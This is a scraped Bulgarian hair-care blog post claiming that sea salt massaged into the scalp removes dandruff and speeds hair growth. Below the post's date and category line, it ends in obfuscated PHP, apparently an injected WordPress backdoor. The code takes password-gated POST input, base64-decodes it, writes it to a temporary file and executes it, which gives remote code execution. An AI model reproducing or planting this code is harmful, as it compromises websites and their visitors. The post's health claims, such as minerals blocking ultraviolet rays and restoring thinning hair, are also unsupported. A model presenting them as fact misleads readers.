Морската сол премахва пърхота и засилва растежа на косата! Ето как да я използваме: | Косопад

Морската сол премахва пърхота и засилва растежа на косата! Ето как да я използваме:

kosa-more-2

Морската сол е много полезна за косата и кожата. Ако я смесим с шампоана си, ще се отървем от пърхота и ще подсилим растежа на косата.

Морската сол е богата на ценни минерали, които имат специфични качества. Ето някои от тях:

– Калций: успокоява кожата и я подхранва, пречиства порите
– Магнезий: увеличават метаболизма на клетките
– Бром: има противовъзпалително действие
– Натриев хлорид: хидратира клетките на кожата, пречиства я от токсини
– Цинк: подобрява растежа и възстановяването на клетките, блокира ултравиолетовите лъчи
– Сяра: облекчава псориазиса и екземата

kosa-morska sol

Ето как морската сол елиминира пърхота и увеличава растежа на косата:

Това е естествен начин да се отървем от досадния пърхот. Разделяме косата на кичури и поръсваме скалпа с 1-2 лъжички фина морска сол. Масажираме внимателно с навлажнени пръсти 10 минути, после мием косата.

Освен че премахва пърхота, морската сол абсорбира излишните мазнини. Така че, ако имате мазна коса, ще ви е много полезна. Спира растежа на кожните гъбички.

Забелязвате, че косата ви е изтъняла и не расте? Морската сол е идеално средство за засилване на растежа. Подхранва корените и увеличава кръвообращението на косата, което стимулира израстването на косъма.

Мием косата си, както обикновено. Правим масаж с морска сол за 10- 15 минути преди да отмием. Прави се 2 пъти седмично с продължение на 2 месеца. И отново ще видите как косата ви става гъста и дълга.

26. юли 2017 11:26:53 от Надя Колева
Категории: Рецепти при косопад | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}